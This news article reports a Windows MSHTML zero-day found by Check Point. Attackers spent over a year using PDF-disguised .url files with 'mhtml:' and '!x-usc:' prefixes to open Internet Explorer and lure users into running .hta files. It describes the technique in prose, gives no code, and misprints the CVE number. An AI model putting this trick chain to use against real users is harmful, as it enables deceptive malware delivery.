Attackers launched zero-day attacks targeting Windows users with malware for more than a year before Microsoft patched the vulnerability that made it possible, researchers said Tuesday.
The vulnerability, which is present in both Windows 10 and 11, causes devices to open Internet Explorer, a legacy browser that Microsoft retired in 2022 after its outdated codebase made it increasingly susceptible to exploits. Following the move, Windows made it difficult, if not impossible, to open the browser, which was first introduced in the mid-1990s.
Old and new tricks
Malicious code exploiting the vulnerability dates back to at least January 2023 and was circulating as recently as May of this year, according to the researchers who discovered and reported the vulnerability to Microsoft. The company patched the vulnerability, tracked as CVE-2024-CVE-38112, on Tuesday as part of its monthly patch release program. The vulnerability, which was in Windows’ MSHTML engine, had a severity rating of 7.0 out of 10.
According to researchers at security firm Check Point, the attack code “executed new (or previously unknown) tricks to lure Windows users into remote code execution.” A link that appeared to open a PDF file added a .url extension to the end of the file, for example Books_A0UJKO.pdf.url, found in one of the malicious code samples.
When viewed in Windows, the file displayed an icon indicating that the file was a PDF rather than a .url file. Such files are designed to open an application specified in a link.
A link in the file called msedge.exe, a file that executes Edge. However, the link contained two attributes: mhtml: and !x-usc:, an “old trick” that attackers have been using for years to trick Windows applications like MS Word into opening. It also contained a link to a malicious website. When clicked, the .url file, disguised as a PDF, opened the site, not in Edge, but in Internet Explorer.
“From there (the website opened with IE) the attacker can do a lot of bad things, because IE is insecure and outdated,” wrote Haifei Li, the Check Point researcher who discovered the vulnerability. “For example, if the attacker has an IE zero-day exploit, which is much easier to find than Chrome/Edge, the attacker can target the victim to achieve remote code execution immediately. However, in the samples we analyzed, the threat actors did not use any IE remote code execution exploit. Instead, they used another trick in IE, which was probably not publicly known before, as far as we know, to trick the victim into achieving remote code execution.”
IE would then present the user with a dialog box asking if they wanted to open the file masquerading as a PDF. If the user clicked “open,” Windows would present a second dialog box with a vague message that proceeding would open content on the Windows device. If the user clicked “allow,” IE would load a file ending in .hta, an extension that causes Windows to open the file in Internet Explorer and execute embedded code.
“To summarize the attacks from an exploitation perspective, the first technique used in these campaigns is the “mhtml” trick, which allows the attacker to invoke IE instead of the more secure Chrome/Edge,” Li wrote. “The second technique is an IE trick to trick the victim into believing that they are opening a PDF file, when in fact they are downloading and executing a malicious .hta application. The overall goal of these attacks is to trick the victim into believing that they are opening a PDF file, and this is achieved by using these two tricks.”
The Check Point post contains cryptographic hashes for six malicious .url files used in the campaign. Windows users can use the hashes to check if they have been targeted.